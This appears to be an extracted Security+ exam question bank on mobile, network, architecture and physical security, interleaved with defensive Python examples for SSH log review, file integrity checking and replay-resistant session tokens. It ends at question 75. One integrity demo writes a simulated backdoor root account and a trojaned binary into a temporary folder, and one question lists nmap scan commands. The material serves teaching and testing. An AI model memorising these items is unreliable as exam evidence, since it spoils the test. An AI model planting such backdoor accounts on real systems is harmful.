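Jun 12 03:16:02 edge-rtr1 %SEC-6-IPACCESSLOGP: list DC-IN permitted tcp 10.0.9.14(50122) -> 10.0.1.20(22), 1 packet
"""


def is_internal(ip):
    """True for RFC 1918 sources; everything else is treated as outside."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def external_ssh_hits(log_text):
    """Permitted tcp/22 entries whose source is outside the private ranges."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        if m["action"] != "permitted" or m["proto"] != "tcp" or m["dport"] != "22":
            continue
        if is_internal(m["src"]):
            continue
        hits.append({"acl": m["acl"], "src": m["src"], "dst": m["dst"]})
    return hits


if __name__ == "__main__":
    for hit in external_ssh_hits(SAMPLE_LOG):
        print(f"ACL {hit['acl']} let {hit['src']} reach SSH on {hit['dst']}")
```

- Only the first line is reported: the 443 hit is expected traffic, the second port-22 attempt was denied, and the last one comes from inside. A hit here confirms the exposure; whether a breach followed is a question for the SSH server's own auth log.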
- 143. Gianna is evaluating the security of her company. The company has a number of mobile
- apps that were developed in house for use on COPE devices. She wants to ensure that
- these apps are updated as soon as an update is available. What should she ensure is being
- used?
- A. Firmware OTA
- B. Push notifications
- C. Scheduled updates
- D. A policy against custom firmware
- 144. Liam is concerned about the security of both COPE and BYOD devices. His company uses
- a lot of Android-based devices, and he is concerned about users getting administrative
- access and altering security features. What should he prohibit in his company?
- A. Third-party app stores
- B. Jailbreaking
- C. Custom firmware
- D. Rooting
- 145. Heidi works for a large company that issues various mobile devices (tablets and phones)
- to employees. She is concerned about unauthorized access to mobile devices. Which of the
- following would be the best way to mitigate that concern?
- A. Biometrics
- B. Screen lock
- C. Context-aware authentication
- D. Storage segmentation
- 146. You are looking for a point-to-point connection method that would allow two devices to
- synchronize data. The solution you pick should not be affected by EMI (electromagnetic
- interference) and should be usable over distances exceeding 10 meters, provided there is a
- line-of-sight connection. What would be the best solution?
- A. Bluetooth
- B. WiFi
- C. Infrared
- D. RF
- 147. You wish to use nmap to scan one of your servers, whose IP address is 192.168.1.16. The
- target is one of your own Windows servers. You want a scan that is the most thorough,
- and you are not concerned about it being detected. Which of the following would best
- accomplish that?
- A. nmap -sW -sL -T1 192.168.1.16/24
- B. nmap -sW -sT -T1 192.168.1.16
- C. nmap -sW -sT -T5 192.168.1.16/24
- D. nmap -sW -sT -sO -T5 192.168.1.16
- 148. What command would produce the output shown here?
- A. netstat -a
- B. arp -a
- C. arp -s
- D. netstat -s
- 149. Ethan has noticed some users on his network accessing inappropriate videos. His network
- uses a proxy server that has content filtering with blacklisting. What is the most likely
- cause of this issue?
- A. Sites not on the blacklist
- B. Misconfigured content filtering
- C. Misconfigured proxy server
- D. Someone circumventing the proxy server
- 150. You are looking for tools to assist in penetration testing your network. Which of the
- following best describes Metasploit?
- A. Hacking tool
- B. Vulnerability scanner
- C. Exploit framework
- D. Network scanner
- 151. Logan is responsible for enforcing security policies in his company. There are a number of
- policies regarding the proper configuration of public-facing servers. Which of the following
- would be the best way for Logan to check to see if such policies are being enforced?
- A. Periodically audit selected servers.
- B. Implement a configuration compliance scanning solution.
- C. Conduct routine penetration tests of those servers.
- D. Implement a vulnerability scanning solution.
- ++++++
- +++++
- Architecture and
- Design
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 3.1 Explain use cases and purpose for frameworks, best
- practices and secure configuration guides.
- ■ ■
- ■ ■
- Industry-standard frameworks and reference architectures
- ■ ■ Regulatory
- ■ ■ Non-regulatory
- ■ ■ National vs. international
- ■ ■ Industry-specific frameworks
- Benchmarks/secure configuration guides
- ■ ■
- ■ ■
- ■ ■
- Platform/vendor-specific guides
- ■ ■ Web server
- ■ ■ Operating system
- ■ ■ Application server
- ■ ■ Network infrastructure devices
- General purpose guides
- Defense-in-depth/layered security
- ■ ■ Vendor diversity
- ■ ■ Control diversity
- ■ ■
- ■ ■ Administrative
- ■ ■ Technical
- User training
- ✓ ✓ 3.2 Given a scenario, implement secure network
- architecture concepts.
- ■ ■
- Zones/topologies
- ■ ■
- DMZ■ ■
- ■ ■
- ■ ■
- ■ ■
- ■ ■ Extranet
- ■ ■ Intranet
- ■ ■ Wireless
- ■ ■ Guest
- ■ ■ Honeynets
- ■ ■ NAT
- ■ ■ Ad hoc
- Segregation/segmentation/isolation
- ■ ■ Physical
- ■ ■ Logical (VLAN)
- ■ ■ Virtualization
- ■ ■ Air gaps
- Tunneling/VPN
- ■ ■ Site-to-site
- ■ ■ Remote access
- Security device/technology placement
- ■ ■ Sensors
- ■ ■ Collectors
- ■ ■ Correlation engines
- ■ ■ Filters
- ■ ■ Proxies
- ■ ■ Firewalls
- ■ ■ VPN concentrators
- ■ ■ SSL accelerators
- ■ ■ Load balancers
- ■ ■ DDoS mitigator
- ■ ■ Aggregation switches
- ■ ■ Taps and port mirror
- SDN✓ ✓ 3.3 Given a scenario, implement secure systems design.
- ■ ■
- ■ ■
- Hardware/firmware security
- ■ ■ FDE/SED
- ■ ■ TPM
- ■ ■ HSM
- ■ ■ UEFI/BIOS
- ■ ■ Secure boot and attestation
- ■ ■ Supply chain
- ■ ■ Hardware root of trust
- ■ ■ EMI/EMP
- Operating systems
- ■ ■
- ■ ■
- Types
- ■ ■ Network
- ■ ■ Server
- ■ ■ Workstation
- ■ ■ Appliance
- ■ ■ Kiosk
- ■ ■ Mobile OS
- ■ ■ Patch management
- ■ ■ Disabling unnecessary ports and services
- ■ ■ Least functionality
- ■ ■ Secure configurations
- ■ ■ Trusted operating system
- ■ ■ Application whitelisting/blacklisting
- ■ ■ Disable default accounts/passwords
- Peripherals
- ■ ■ Wireless keyboards
- ■ ■ Wireless mice
- ■ ■ Displays
- ■ ■ WiFi-enabled MicroSD cards
- ■ ■ Printers/MFDs
- ■ ■ External storage devices
- ■ ■ Digital cameras✓ ✓ 3.4 Explain the importance of secure staging
- deployment concepts.
- ■ ■ Sandboxing
- ■ ■ Environment
- ■ ■ Development
- ■ ■ Test
- ■ ■ Staging
- ■ ■ Production
- ■ ■ Secure baseline
- ■ ■ Integrity measurement
- ✓ ✓ 3.5 Explain the security implications of embedded
- systems.
- ■ ■ SCADA/ICS
- ■ ■ Smart devices/IoT
- ■ ■ Wearable technology
- ■ ■ Home automation
- ■ ■ HVAC
- ■ ■ SoC
- ■ ■ RTOS
- ■ ■ Printers/MFDs
- ■ ■ Camera systems
- ■ ■ Special purpose
- ■ ■ Medical devices
- ■ ■ Vehicles
- ■ ■ Aircraft/UAV
- ✓ ✓ 3.6 Summarize secure application development and
- deployment concepts.
- ■ ■
- Development life-cycle models
- ■ ■
- ■ ■
- Waterfall vs. Agile
- Secure DevOps
- ■ ■ Security automation
- ■ ■ Continuous integration■ ■ Baselining
- ■ ■ Immutable systems
- ■ ■ Infrastructure as code
- ■ ■ Version control and change management
- ■ ■ Provisioning and deprovisioning
- ■ ■ Secure coding techniques
- ■ ■
- ■ ■
- ✓ ✓ 3.7
- ■ ■
- ■ ■ Proper error handling
- ■ ■ Proper input validation
- ■ ■ Normalization
- ■ ■ Stored procedures
- ■ ■ Code signing
- ■ ■ Encryption
- ■ ■ Obfuscation/camouflage
- ■ ■ Code reuse/dead code
- ■ ■ Server-side vs. client-side execution and validation
- ■ ■ Memory management
- ■ ■ Use of third-party libraries and SDKs
- ■ ■ Data exposure
- Code quality and testing
- ■ ■ Static code analyzers
- ■ ■ Dynamic analysis (e.g., fuzzing)
- ■ ■ Stress testing
- ■ ■ Model verification
- Compiled vs. runtime code
- Summarize cloud and virtualization concepts.
- Hypervisor
- ■ ■ Type I
- ■ ■ Type II
- ■ ■ Application cells/containers
- ■ ■ VM sprawl avoidance
- ■ ■ VM escape protection
- ■ ■ Cloud storage■ ■
- Cloud deployment models
- ■ ■ SaaS
- ■ ■ PaaS
- ■ ■ IaaS
- ■ ■ Private
- ■ ■ Public
- ■ ■ Hybrid
- ■ ■ Community
- ■ ■ On-premise vs. hosted vs. cloud
- ■ ■ VDI/VDE
- ■ ■ Cloud access security broker
- ■ ■ Security as a Service
- ✓ ✓ 3.8 Explain how resiliency and automation strategies
- reduce risk.
- ■ ■
- Automation/scripting
- ■ ■ Automated courses of action
- ■ ■ Continuous monitoring
- ■ ■ Configuration validation
- ■ ■ Templates
- ■ ■ Master image
- ■ ■ Non-persistence
- ■ ■ Snapshots
- ■ ■ Revert to known state
- ■ ■ Rollback to known configuration
- ■ ■ Live boot media
- ■ ■ Elasticity
- ■ ■ Scalability
- ■ ■ Distributive allocation
- ■ ■ Redundancy
- ■ ■ Fault tolerance
- ■ ■ High availability
- ■ ■ RAID✓ ✓ 3.9
- Explain the importance of physical security controls.
- ■ ■ Lighting
- ■ ■ Signs
- ■ ■ Fencing/gate/cage
- ■ ■ Security guards
- ■ ■ Alarms
- ■ ■ Safe
- ■ ■ Secure cabinets/enclosures
- ■ ■ Protected distribution/Protected cabling
- ■ ■ Airgap
- ■ ■ Mantrap
- ■ ■ Faraday cage
- ■ ■ Lock types
- ■ ■ Biometrics
- ■ ■ Barricades/bollards
- ■ ■ Tokens/cards
- ■ ■ Environmental controls
- ■ ■ HVAC
- ■ ■ Hot and cold aisles
- ■ ■ Fire suppression
- ■ ■ Cable locks
- ■ ■ Screen filters
- ■ ■ Cameras
- ■ ■ Motion detection
- ■ ■ Logs
- ■ ■ Infrared detection
- ■ ■ Key management
- ■
- Architecture and Design
- 1. Caroline has been asked to find a standard to guide her company’s choices in
- implementing information security management systems. She is looking for a standard
- that is international. Which of the following would be the best choice for her?
- A. ISO 27002
- B. ISO 27017
- C. NIST 800-12
- D. NIST 800-14
- 2. You are responsible for network security at an e-commerce company. You want to ensure
- that you are using best practices for the e-commerce website your company hosts. What
- standard would be the best for you to review?
- A. OWASP
- B. NERC
- C. NIST
- D. ISA/IEC
- 3. Cheryl is responsible for cybersecurity at a mid-sized insurance company. She has decided
- to utilize a different vendor for network antimalware than she uses for host antimalware.
- Is this a recommended action, and why or why not?
- A. This is not recommended; you should use a single vendor for a particular security
- control.
- B. This is recommended; this is described as vendor diversity.
- C. This is not recommended; this is described as vendor forking.
- D. It is neutral. This does not improve or detract from security.
- 4. Maria is a security administrator for a large bank. She is concerned about malware,
- particularly spyware that could compromise customer data. Which of the following would be
- the best approach for her to mitigate the threat of spyware?
- A. Computer usage policies, network antimalware, and host antimalware
- B. Host antimalware and network antimalware
- C. Host and network antimalware, computer usage policies, and website whitelisting
- D. Host and network antimalware, computer usage policies, and employee training
- 5. Gabriel is setting up a new e-commerce server. He is concerned about security issues.
- Which of the following would be the best location to place an e-commerce server?
- A. DMZ
- B. Intranet
- C. Guest network
- D. Extranet
- 6. Enrique is concerned about backup data being infected by malware. The company backs
- up key servers to digital storage on a backup server. Which of the following would be
- most effective in preventing the backup data being infected by malware?
- A. Place the backup server on a separate VLAN.
- B. Air-gap the backup server.
- C. Place the backup server on a different network segment.
- D. Use a honeynet.
- 7. Janelle is the security administrator for a small company. She is trying to improve security
- throughout the network. Which of the following steps should she take first?
- A. Implement antimalware on all computers.
- B. Implement acceptable use policies.
- C. Turn off unneeded services on all computers.
- D. Turn on host-based firewalls on all computers.
- 8. Mary is the CISO for a mid-sized company. She is attempting to mitigate the danger
- of computer viruses. Which administrative control can she implement to help achieve
- this goal?
- A. Implement host-based antimalware.
- B. Implement policies regarding email attachments and file downloads.
- C. Implement network-based antimalware.
- D. Block portable storage devices from being connected to computers.
- 9. You are the network administrator for a large company. Your company frequently has
- nonemployees in the company such as clients and vendors. You have been directed to
- provide these nonemployees with access to the Internet. Which of the following is the best
- way to implement this?
- A. Establish a guest network.
- B. Allow nonemployees to connect only to the DMZ.
- C. Allow nonemployees to connect only to the intranet.
- D. Establish limited accounts on your network for nonemployees to use.
- 10. Juan is a network administrator for an insurance company. His company has a number
- of traveling salespeople. He is concerned about confidential data on their laptops. What is
- the best way for him to address this?
- A. FDE
- B. TPM
- C. SDN
- D. DMZ
- 11. Terrance is responsible for secure communications on his company’s network. The
- company has a number of traveling salespeople who need to connect to network
- resources. What technology would be most helpful in addressing this need?
- A. VPN concentrator
- B. SSL accelerator
- C. DMZ
- D. Guest network
- 12. Mohaned is concerned about malware infecting machines on his network. One of his
- concerns is that malware would be able to access sensitive system functionality that
- requires administrative access. What technique would best address this issue?
- A. Implementing host-based antimalware
- B. Using a nonadministrative account for normal activities
- C. Implementing FDE
- D. Making certain the operating systems are patched
- 13. John works for an insurance company. His company uses a number of operating systems,
- including Windows and Linux. In this mixed environment, what determines the network
- operating system?
- A. The OS of the DNS server
- B. The OS of the domain controller
- C. The OS of the majority of servers
- D. The OS of the majority of client computers
- 14. Juanita is implementing virtualized systems in her network. She is using Type I
- hypervisors. What operating system should be on the machines for her to install
- the hypervisor?
- A. None
- B. Windows
- C. Any operating system
- D. Windows or Linux
- 15. You are responsible for security at your company. You want to improve cloud security by
- following the guidelines of an established international standard. What standard would
- be most helpful?
- A. NIST 800-14
- B. NIST 800-53
- C. ISO 27017
- D. ISO 27002
- 16. You are responsible for setting up a kiosk computer that will be in your company’s lobby.
- It will be accessible for visitors to locate employee offices, obtain the guest WiFi pass-
- word, and retrieve general public company information. What is the most important thing
- to consider when configuring this system?
- A. Using a strong administrator password
- B. Limiting functionality to only what is needed
- C. Using good antivirus protection
- D. Implementing a host-based firewall
- 17. You are concerned about peripheral devices being exploited by an attacker. Which of the
- following is the first step you should take to mitigate this threat?
- A. Disable WiFi for any peripheral that does not absolutely need it.
- B. Enable BIOS protection for peripheral devices.
- C. Use strong encryption on all peripheral devices.
- D. Configure antivirus on all peripherals.
- 18. Which design concept limits access to systems from outside users while protecting users
- and systems inside the LAN?
- A. DMZ
- B. VLAN
- C. Router
- D. Guest network
- 19. Which of the following is the equivalent of a VLAN from a physical security perspective?
- A. Perimeter security
- B. Partitioning
- C. Security zones
- D. Firewall
- 20. In an attempt to observe hacker techniques, a security administrator configures a
- nonproduction network to be used as a target so that he can covertly monitor network
- attacks. What is this type of network called?
- A. Active detection
- B. False subnet
- C. IDS
- D. Honeynet
- 21. You have instructed all administrators to disable all nonessential ports on servers at their
- sites. Why are nonessential protocols a security issue that you should be concerned about?
- A. Nonessential ports provide additional areas of attack.
- B. Nonessential ports can’t be secured.
- C. Nonessential ports are less secure.
- D. Nonessential ports require more administrative effort to secure.
- 22. Which type of firewall examines the content and context of each packet it encounters?
- A. Packet filtering firewall
- B. Stateful packet filtering firewall
- C. Application layer firewall
- D. Gateway firewall
- 23. Which of the following would prevent a user from installing a program on a
- company-owned mobile device?
- A. Whitelisting
- B. Blacklisting
- C. ACL
- D. HIDS
- 24. You’re designing a new network infrastructure so that your company can allow
- unauthenticated users connecting from the Internet to access certain areas. Your goal is to protect
- the internal network while providing access to those areas. You decide to put the web
- server on a separate subnet open to public contact. What is this subnet called?
- A. Guest network
- B. DMZ
- C. Intranet
- D. VLAN
- 25. Upper management has decreed that a firewall must be put in place immediately, before
- your site suffers an attack similar to one that struck a sister company. Responding to
- this order, your boss instructs you to implement a packet filter by the end of the week. A
- packet filter performs which function?
- A. Prevents unauthorized packets from entering the network
- B. Allows all packets to leave the network
- C. Allows all packets to enter the network
- D. Eliminates collisions in the network
- 26. You’re outlining your plans for implementing a wireless network to upper management.
- Which protocol was designed to provide security for a wireless network and is considered
- equivalent to the security of a wired network?
- A. WAP
- B. WPA
- C. WPA2
- D. WEP
- 27. An IV attack is usually associated with which of the following wireless protocols?
- A. WEP
- B. WAP
- C. WPA
- D. WPA2
- 28. Suzan is responsible for application development in her company. She wants to have all
- web applications tested prior to being deployed live. She wants to use a test system that is
- identical to the live server. What is this called?
- A. Production server
- B. Development server
- C. Test server
- D. Predeployment server
- 29. John is responsible for security in his company. He is implementing a kernel integrity
- subsystem for key servers. What is the primary benefit of this action?
- A. To detect malware
- B. To detect whether files have been altered
- C. To detect rogue programs being installed
- D. To detect changes to user accounts
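- Questions 132 and 29 both turn on the same control: a file integrity checker records a cryptographic hash of every file in a known-good state and later reports what was modified, added or removed. The script below is an added example, not code from the original question bank or from any particular product (AIDE, Tripwire and the Linux kernel's IMA do this in production). It builds a throwaway directory tree, baselines it, simulates an intrusion (trojaned binary, backdoor account, dropped tool, deleted config) and diffs the two baselines; the file names and contents are constructed for the demonstration.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path):
    """Stream a file through SHA-256 so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def compare(old, new):
    """Classify differences between a stored baseline and a fresh scan."""
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def demo():
    """Constructed scenario: build a tree, baseline it, simulate a breach, diff."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0::/root:/bin/sh\n")
        (root / "etc" / "ssh_config").write_text("PermitRootLogin no\n")
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"\x7fELF...original\n")
        before = baseline(root)          # in real use: stored off-host or signed

        # attacker activity: trojaned binary, backdoor account, dropped tool, config removed
        (root / "bin" / "ls").write_bytes(b"\x7fELF...trojan\n")
        (root / "etc" / "passwd").write_text(
            "root:x:0:0::/root:/bin/sh\nbackdoor:x:0:0::/:/bin/sh\n")
        (root / "tmp").mkdir()
        (root / "tmp" / ".x").write_text("#!/bin/sh\n")
        (root / "etc" / "ssh_config").unlink()

        after = baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind}: {paths}")
```

- The baseline only has evidentiary value if the attacker cannot rewrite it, so it belongs on read-only media, a separate host, or under a signature the scanning host cannot produce; an attacker with root who can update the baseline has defeated the control.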
- 30. You are responsible for BIOS security in your company. Which of the following is the
- most fundamental BIOS integrity technique?
- A. Verifying the BIOS version
- B. Using a TPM
- C. Managing BIOS passwords
- D. Backing up the BIOS
- 31. You have been asked to implement security for SCADA systems in your company. Which
- of the following standards will be most helpful to you?
- A. NIST 800-82
- B. PCI-DSS
- C. NIST 800-30
- D. ISO 27002
- 32. Joanne works for a large insurance company. Some employees have wearable technology,
- such as smart watches. What is the most significant security concern from such devices?
- A. These devices can distract employees.
- B. These devices can be used to carry data in and out of the company.
- C. These devices may not have encrypted drives.
- D. These devices may not have strong passwords.
- 33. John is installing an HVAC system in his datacenter. What will this HVAC have the most
- impact on?
- A. Confidentiality
- B. Availability
- C. Fire suppression
- D. Monitoring access to the datacenter
- 34. Maria is a security engineer with a manufacturing company. During a recent
- investigation, she discovered that an engineer’s compromised workstation was being used to
- connect to SCADA systems while the engineer was not logged in. The engineer is responsible
- for administering the SCADA systems and cannot be blocked from connecting to them.
- What should Maria do to mitigate this threat?
- A. Install host-based antivirus software on the engineer’s system.
- B. Implement account usage auditing on the SCADA system.
- C. Implement an NIPS on the SCADA system.
- D. Use FDE on the engineer’s system.
- 35. Lucy works as a network administrator for a large company. She needs to administer
- several servers. Her objective is to make it easy to administer and secure these servers, as well
- as making the installation of new servers more streamlined. Which of the following best
- addresses these issues?
- A. Setting up a cluster
- B. Virtualizing the servers
- C. Putting the servers on a VLAN
- D. Putting the servers on a separate subnet
- 36. Gerard is responsible for secure communications with his company’s e-commerce server.
- All communications with the server use TLS. What is the most secure option for Gerard
- to store the private key on the e-commerce server?
- A. HSM
- B. FDE
- C. SED
- D. SDN
- 37. You are the security officer for a large company. You have discovered malware on one of
- the workstations. You are concerned that the malware might have multiple functions and
- might have caused more security issues with the computer than you can currently detect.
- What is the best way to test this malware?
- A. Leave the malware on that workstation until it is tested.
- B. Place the malware in a sandbox environment for testing.
- C. It is not important to test it; just remove it from the machine.
- D. Place the malware on a honeypot for testing.
- 38. Web developers in your company currently have direct access to the production server and
- can deploy code directly to it. This can lead to unsecure code, or simply code flaws being
- deployed to the live system. What would be the best change you could make to mitigate
- this risk?
- A. Implement sandboxing.
- B. Implement virtualized servers.
- C. Implement a staging server.
- D. Implement deployment policies.
- 39. Denish is concerned about the security of embedded devices in his company. He is most
- concerned about the operating system security for such devices. Which of the following
- would be the best option for mitigating this threat?
- A. RTOS
- B. SCADA
- C. FDE
- D. TPM
- 40. Which of the following 802.11 standards is supported in WPA2, but not in WEP or WPA?
- A. 802.11a
- B. 802.11b
- C. 802.11i
- D. 802.11n
- 41. Teresa is responsible for WiFi security in her company. Which wireless security protocol
- uses TKIP?
- A. WPA
- B. CCMP
- C. WEP
- D. WPA2
- 42. Juan is responsible for wireless security in his company. He has decided to disable the SSID
- broadcast on the single AP the company uses. What will the effect be on client machines?
- A. They will no longer be able to use wireless networking.
- B. They will no longer see the SSID as a preferred network when they are connected.
- C. They will no longer see the SSID as an available network.
- D. They will be required to make the SSID part of their HomeGroup.
- 43. Which cloud service model provides the consumer with the infrastructure to create
- applications and host them?
- A. SaaS
- B. PaaS
- C. IaaS
- D. CaaS
- 44. Which cloud service model gives the consumer the ability to use applications provided by
- the cloud provider over the Internet?
- A. SaaS
- B. PaaS
- C. IaaS
- D. CaaS
- 45. Which feature of cloud computing involves dynamically provisioning (or deprovisioning)
- resources as needed?
- A. Multitenancy
- B. Elasticity
- C. CMDB
- D. Sandboxing
- 46. Which type of hypervisor implementation is known as “bare metal”?
- A. Type I
- B. Type II
- C. Type III
- D. Type IV
- 47. Mohaned is a security analyst and has just removed malware from a virtual server. What
- feature of virtualization would he use to return the virtual server to a last known good
- state?
- A. Sandboxing
- B. Hypervisor
- C. Snapshot
- D. Elasticity
- 48. Lisa is concerned about fault tolerance for her database server. She wants to ensure that if
- any single drive fails, it can be recovered. What RAID level would support this goal while
- using distributed parity bits?
- A. RAID 0
- B. RAID 1
- C. RAID 3
- D. RAID 5
- 49. Jarod is concerned about EMI affecting a key escrow server. Which method would be
- most effective in mitigating this risk?
- A. VLAN
- B. SDN
- C. Trusted platform module
- D. Faraday cage
- 50. John is responsible for physical security at his company. He is particularly concerned
- about an attacker driving a vehicle into the building. Which of the following would
- provide the best protection against this threat?
- A. A gate
- B. Bollards
- C. A security guard on duty
- D. Security cameras
- 51. Mark is responsible for cybersecurity at a small college. There are many computer labs
- that are open for students to use. These labs are monitored only by a student worker, who
- may or may not be very attentive. Mark is concerned about the theft of computers. Which
- of the following would be the best way for him to mitigate this threat?
- A. Cable locks
- B. FDE on the lab computers
- C. Strong passwords on the lab computers
- D. Having a lab sign-in sheet
- 52. Joanne is responsible for security at a power plant. The facility is very sensitive and security
- is extremely important. She wants to incorporate two-factor authentication with
- physical security. What would be the best way to accomplish this?
- A. Smart cards
- B. A mantrap with a smart card at one door and a PIN keypad at the other door
- C. A mantrap with video surveillance
- D. A fence with a smart card gate access
- 53. Which of the following terms refers to the process of establishing a standard for security?
- A. Baselining
- B. Security evaluation
- C. Hardening
- D. Normalization
- 54. You are trying to increase security at your company. You’re currently creating an outline
- of all the aspects of security that will need to be examined and acted on. Which of the following
- terms describes the process of improving security in a trusted OS?
- A. FDE
- B. Hardening
- C. SED
- D. Baselining
- 55. Which level of RAID is a “stripe of mirrors”?
- A. RAID 1+0
- B. RAID 6
- C. RAID 0
- D. RAID 1
- 56. Isabella is responsible for database management and security. She is attempting to remove
- redundancy in the database. What is this process called?
- A. Integrity checking
- B. Deprovisioning
- C. Baselining
- D. Normalization
- 57. A list of applications approved for use on your network would be known as which of the
- following?
- A. Blacklist
- B. Red list
- C. Whitelist
- D. Orange list
- 58. Hans is a security administrator for a large company. Users on his network visit a wide
- range of websites. He is concerned they might get malware from one of these many websites.
- Which of the following would be his best approach to mitigate this threat?
- A. Implement host-based antivirus.
- B. Blacklist known infected sites.
- C. Set browsers to allow only signed components.
- D. Set browsers to block all active content (ActiveX, JavaScript, etc.).
- 59. Elizabeth has implemented agile development for her company. What is the primary difference
- between agile development and the waterfall method?
- A. Agile has fewer phases.
- B. Waterfall has fewer phases.
- C. Agile is more secure.
- D. Agile repeats phases.
- 60. John is using the waterfall method for application development. At which phase should he
- implement security measures?
- A. Requirements
- B. Design
- C. Implementation
- D. All
- 61. You are responsible for database security at your company. You are concerned that pro-
- grammers might pass badly written SQL commands to the database, or that an attacker
- might exploit badly written SQL in applications. What is the best way to mitigate this
- threat?
- A. Programmer training
- B. Programming policies
- C. Agile programming
- D. Stored procedures
- 62. Mary is concerned about application security for her company’s application development.
- Which of the following is the most important step for addressing application security?
- A. Proper error handling
- B. Regular data backups
- C. Encrypted data transmission
- D. Strong authentication
- 63. Farès is responsible for managing the many virtual machines on his company’s networks.
- Over the past two years, the company has increased the number of virtual machines significantly.
- Farès is no longer able to effectively manage the large number of machines.
- What is the term for this situation?
- A. VM overload
- B. VM sprawl
- C. VM spread
- D. VM zombies
- 64. Mary is responsible for virtualization management in her company. She is concerned
- about VM escape. Which of the following methods would be the most effective in mitigating
- this risk?
- A. Only share resources between the VM and host if absolutely necessary.
- B. Keep the VM patched.
- C. Use a firewall on the VM.
- D. Use host-based antimalware on the VM.
- 65. You work at a large company. You are concerned about ensuring that all workstations
- have a common configuration, no rogue software is installed, and all patches are kept up
- to date. Which of the following would be the most effective for accomplishing this?
- A. Use VDE.
- B. Implement strong policies.
- C. Use an image for all workstations.
- D. Implement strong patch management.
- 66. Juan is responsible for the physical security of the company server room. He has been
- asked to recommend a type of fire suppression system for the server room. Which of the
- following would be the best choice?
- A. Wet pipe
- B. Deluge
- C. Pre-action
- D. Halon
- 67. You are responsible for server room security for your company. You are concerned about
- physical theft of the computers. Which of the following would be best able to detect theft
- or attempted theft?
- A. Motion sensor–activated cameras
- B. Smart card access to the server rooms
- C. Strong deadbolt locks for the server rooms
- D. Logging everyone who enters the server room
- 68. Teresa has deployed session tokens on her network. These would be most effective against
- which of the following attacks?
- A. DDoS
- B. Replay
- C. SYN flood
- D. Malware
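- Question 68 turns on why a session token defeats a replay attack. The following is an added example, not part of the original question set: the server issues an HMAC-SHA256 signed token carrying the user, a random nonce and an expiry, and the verifier rejects a token whose signature does not match, one past its expiry, and one whose nonce it has already consumed. SERVER_KEY, issue_token, TokenVerifier and the user names are assumptions made for illustration; user identifiers are assumed to contain no colon.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side signing key; generated here so the example runs offline.
# A real deployment loads it from a secrets store and rotates it.
SERVER_KEY = secrets.token_bytes(32)


def _mac(body: str) -> str:
    """HMAC-SHA256 over the token body, hex encoded."""
    return hmac.new(SERVER_KEY, body.encode(), hashlib.sha256).hexdigest()


def issue_token(user_id: str, now: int, ttl: int = 300) -> str:
    """Issue a token of the form user:nonce:expiry:mac.

    The nonce makes every token unique so the verifier can remember which ones
    it has already accepted; the expiry bounds how long that memory must last.
    """
    nonce = secrets.token_hex(16)
    expiry = int(now) + ttl
    body = f"{user_id}:{nonce}:{expiry}"
    return f"{body}:{_mac(body)}"


class TokenVerifier:
    """Server-side verifier that refuses replayed, forged and expired tokens."""

    def __init__(self):
        self.seen = set()  # nonces already consumed (prune at expiry in production)

    def verify(self, token: str, now: int):
        """Return (True, user_id) on success, else (False, reason)."""
        try:
            user_id, nonce, expiry, mac = token.split(":")
        except ValueError:
            return (False, "malformed")
        # Check the signature first: nothing else in the token is trusted until then.
        if not hmac.compare_digest(mac, _mac(f"{user_id}:{nonce}:{expiry}")):
            return (False, "bad signature")
        if int(expiry) < now:
            return (False, "expired")
        # A captured token presented a second time carries a nonce we have seen.
        if nonce in self.seen:
            return (False, "replayed")
        self.seen.add(nonce)
        return (True, user_id)


def demo():
    """Constructed walk-through: legitimate use, replay, tampering and expiry."""
    verifier = TokenVerifier()
    now = 1_700_000_000
    token = issue_token("alice", now)
    first = verifier.verify(token, now + 10)                        # accepted
    replay = verifier.verify(token, now + 20)                       # same token again
    tampered = verifier.verify(token.replace("alice", "admin"), now + 20)
    late = verifier.verify(issue_token("bob", now, ttl=60), now + 120)
    return first, replay, tampered, late


if __name__ == "__main__":
    print(demo())
```

- The signature check runs before any field is interpreted, so a tampered user or expiry never reaches the replay logic. The expiry is what keeps the consumed-nonce set bounded: once a token can no longer validate, its nonce can be dropped.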
- 69. Hector is using infrared cameras to verify that servers in his datacenter are being properly
- racked. Which of the following datacenter elements is he concerned about?
- A. EMI blocking
- B. Humidity control
- C. Hot and cold aisles
- D. HVAC
- 70. Gerald is concerned about unauthorized people entering the company’s building. Which
- of the following would be most effective in preventing this?
- A. Alarm systems
- B. Fencing
- C. Cameras
- D. Security guards
- 71. Which of the following is the most important benefit from implementing SDN?
- A. It will stop malware.
- B. It provides scalability.
- C. It will detect intrusions.
- D. It will prevent session hijacking.
- 72. Mark is an administrator for a health care company. He has to support an older, legacy
- application. He is concerned that this legacy application might have vulnerabilities that
- would affect the rest of the network. What is the most efficient way to mitigate this?
- A. Use an application container.
- B. Implement SDN.
- C. Run the application on a separate VLAN.
- D. Insist on an updated version of the application.
- 73. Lars is auditing the physical security of a company. The company uses chain-link fences
- on its perimeter. The fence is over pavement, not soft ground. How close to the ground
- should the bottom of the fence be?
- A. Touching the ground
- B. Within 4 inches
- C. There is no standard for this.
- D. Within 2 inches
- 74. Mia has to deploy and support a legacy application. The configuration for this application
- and the OS it runs on are very specific and cannot be changed. What is the best approach
- for her to deploy this?
- A. Use an immutable server.
- B. Use a VM.
- C. Set permissions on the application so it cannot be changed.
- D. Place the application on a separate VLAN.
- 75. To mitigate the impact of a software vendor going out of business, a company that uses
- vendor software should require which one of the following?
- A. A detailed credit investigation prior to acquisition
- B. A third-party source-code escrow
